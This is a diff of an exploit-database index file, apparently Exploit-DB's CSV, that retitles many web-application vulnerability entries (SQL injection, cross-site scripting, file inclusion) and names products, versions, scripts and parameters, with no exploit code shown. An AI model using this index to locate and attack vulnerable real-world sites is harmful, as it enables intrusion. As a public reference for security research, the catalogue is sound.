-35940,platforms/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injection",2011-07-12,"Karthik R",php,webapps,0 +35940,platforms/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",php,webapps,0 35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Parameter Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 35943,platforms/php/webapps/35943.txt,"Chyrp 2.x - admin/help.php Multiple Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 @@ -34923,10 +34934,10 @@ id,file,description,date,author,platform,type,port 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 36061,platforms/php/webapps/36061.php,"WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 -36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 +36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injections",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu - 'category.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu - 'main.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 -36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 +36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injections",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting",2011-08-18,G.R0b1n,cfm,webapps,0 36068,platforms/php/webapps/36068.txt,"MantisBT 1.1.8 - Cross-Site Scripting / SQL Injection",2011-08-18,Net.Edit0r,php,webapps,0 36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 @@ -34963,7 +34974,7 @@ id,file,description,date,author,platform,type,port 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0 36112,platforms/php/webapps/36112.txt,"WordPress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 -36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 +36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injections",2011-09-05,"Eyup CELIK",php,webapps,0 36116,platforms/asp/webapps/36116.txt,"Kisanji - 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting / SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0 36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross-Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 @@ -35054,7 +35065,7 @@ id,file,description,date,author,platform,type,port 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 36233,platforms/php/webapps/36233.txt,"WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 -36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Parameter Multiple SQL Injection",2011-10-14,m3rciL3Ss,php,webapps,0 +36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Parameter Multiple SQL Injections",2011-10-14,m3rciL3Ss,php,webapps,0 36237,platforms/php/webapps/36237.txt,"asgbookPHP 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,php,webapps,0 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 @@ -35067,7 +35078,7 @@ id,file,description,date,author,platform,type,port 36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0 36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion",2011-10-25,"Null H4ck3r",php,webapps,0 36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 -36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 +36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",php,webapps,0 @@ -35076,7 +35087,7 @@ id,file,description,date,author,platform,type,port 36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 -36282,platforms/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injection",2011-11-02,"High-Tech Bridge SA",php,webapps,0 +36282,platforms/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections",2011-11-02,"High-Tech Bridge SA",php,webapps,0 36283,platforms/php/webapps/36283.txt,"S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0 36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 @@ -35111,17 +35122,17 @@ id,file,description,date,author,platform,type,port 36328,platforms/php/webapps/36328.txt,"TA.CMS - (TeachArabia) index.php id Parameter SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 36329,platforms/php/webapps/36329.txt,"TA.CMS - (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 36330,platforms/php/webapps/36330.txt,"Dolibarr 3.1 ERP/CRM - Multiple Script URI Cross-Site Scripting",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM - /user/index.php Multiple Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM - /user/info.php id Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM - /admin/boxes.php rowid Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple Parameter SQL Injections",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php' 'id' Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php' 'rowid' Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36338,platforms/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36339,platforms/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36340,platforms/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - modules/mondialrelay/googlemap.php Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 -36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 -36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 +36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php' 'Expedition' Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 +36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 - 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,php,webapps,0 36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0 36347,platforms/php/webapps/36347.txt,"Hastymail2 - 'rs' Parameter Cross-Site Scripting",2011-11-22,HTrovao,php,webapps,0 @@ -35139,8 +35150,8 @@ id,file,description,date,author,platform,type,port 36363,platforms/php/webapps/36363.txt,"WordPress Plugin Skysa App Bar - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 -36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - /admin/admin_blocks.php Filename Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 -36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - /admin/admin_pages.php Filename Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - '/admin/admin_blocks.php' 'Filename' Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - '/admin/admin_pages.php' 'Filename' Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Persistent Cross-Site Scripting",2015-03-13,"ITAS Team",php,webapps,0 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)",2015-03-12,"BGA Security",xml,webapps,0 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps,0 @@ -35153,7 +35164,7 @@ id,file,description,date,author,platform,type,port 36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36382,platforms/php/webapps/36382.txt,"WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36383,platforms/php/webapps/36383.txt,"WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 -36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla! Component 'com_simplephotogallery' 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php' task Parameter Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 @@ -35346,7 +35357,7 @@ id,file,description,date,author,platform,type,port 36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0 36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 36674,platforms/php/webapps/36674.txt,"WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 -36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injection",2015-04-08,LiquidWorm,php,webapps,80 +36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injections",2015-04-08,LiquidWorm,php,webapps,80 36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 36677,platforms/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0 @@ -35396,7 +35407,7 @@ id,file,description,date,author,platform,type,port 36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36733,platforms/php/webapps/36733.txt,"WordPress Plugin'WP Mobile Edition 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 +36733,platforms/php/webapps/36733.txt,"WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 36735,platforms/php/webapps/36735.txt,"WordPress Plugin Duplicator 0.5.14 - SQL Injection / Cross-Site Request Forgery",2015-04-13,"Claudio Viviani",php,webapps,0 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 36738,platforms/php/webapps/36738.txt,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",php,webapps,0 @@ -35428,7 +35439,7 @@ id,file,description,date,author,platform,type,port 36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Cross-Site Request Forgery (Admin Password)",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross-Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 -36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection",2012-02-16,tempe_mendoan,php,webapps,0 +36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injections",2012-02-16,tempe_mendoan,php,webapps,0 36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Inclusion",2012-02-17,"Ucha Gobejishvili",php,webapps,0 36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross-Site Scripting",2012-02-17,sonyy,php,webapps,0 36795,platforms/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps,0 @@ -35474,10 +35485,10 @@ id,file,description,date,author,platform,type,port 36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 36885,platforms/php/webapps/36885.txt,"Bontq - 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,php,webapps,0 36886,platforms/php/webapps/36886.txt,"OSQA's CMS - Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 -36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - /admin/auth.php login_data Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 - /admin/blogs.php nb Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 - /admin/comments.php Multiple Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - /admin/plugin.php page Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php' 'login_data' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php' 'nb' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php' 'page' Parameter Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x - private/en/locale/index name Parameter Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 @@ -35509,8 +35520,8 @@ id,file,description,date,author,platform,type,port 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 -36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 -36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 +36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx' 'guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 +36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx' 'id' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36937,platforms/php/webapps/36937.html,"PHPMyVisites 2.4 - PHPmv2/index.php Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 36938,platforms/php/webapps/36938.txt,"Singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 @@ -35551,7 +35562,7 @@ id,file,description,date,author,platform,type,port 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,php,webapps,0 36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php' authors[][url] Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 -37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 +37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php' 'String::stripUnsafeHtml()' Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 @@ -35571,7 +35582,7 @@ id,file,description,date,author,platform,type,port 37022,platforms/php/webapps/37022.txt,"ocPortal 7.1.5 - code_editor.php Multiple Parameter Cross-Site Scripting",2012-03-28,"High-Tech Bridge",php,webapps,0 37023,platforms/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps,0 37024,platforms/php/webapps/37024.txt,"EZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps,0 -37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 - Personal Multiple SQL Injection",2012-03-30,MR.XpR,php,webapps,0 +37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 Personal - Multiple SQL Injections",2012-03-30,MR.XpR,php,webapps,0 37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' Parameter SQL Injection",2012-03-30,Am!r,php,webapps,0 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Parameter Cross-Site Scripting",2012-03-29,Am!r,php,webapps,0 37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Parameter Cross-Site Scripting",2012-03-30,"Sooraj K.S",php,webapps,0 @@ -35611,7 +35622,7 @@ id,file,description,date,author,platform,type,port 37075,platforms/php/webapps/37075.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - agenda-widget-form.php title Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37076,platforms/php/webapps/37076.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - box_publish_button.php button_value Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37077,platforms/php/webapps/37077.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - save_successful.php msg Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37078,platforms/php/webapps/37078.txt,"WordPress Plugin All-in-One Event Calendar 1.4 agenda-widget.php Multiple Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37078,platforms/php/webapps/37078.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injections",2015-05-21,"Filippo Roncari",php,webapps,80 37080,platforms/php/webapps/37080.txt,"WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps,0 @@ -35622,8 +35633,8 @@ id,file,description,date,author,platform,type,port 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 37090,platforms/php/webapps/37090.txt,"Joomla! Component JA T3 Framework - Directory Traversal",2012-04-17,indoushka,php,webapps,0 37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'Username' Parameter Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 -37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - /modules/pm/pmlite.php to_userid Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 -37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 +37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - '/modules/pm/pmlite.php' 'to_userid' Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 +37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php' redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'Username' Parameter Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 @@ -35649,7 +35660,7 @@ id,file,description,date,author,platform,type,port 37116,platforms/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection 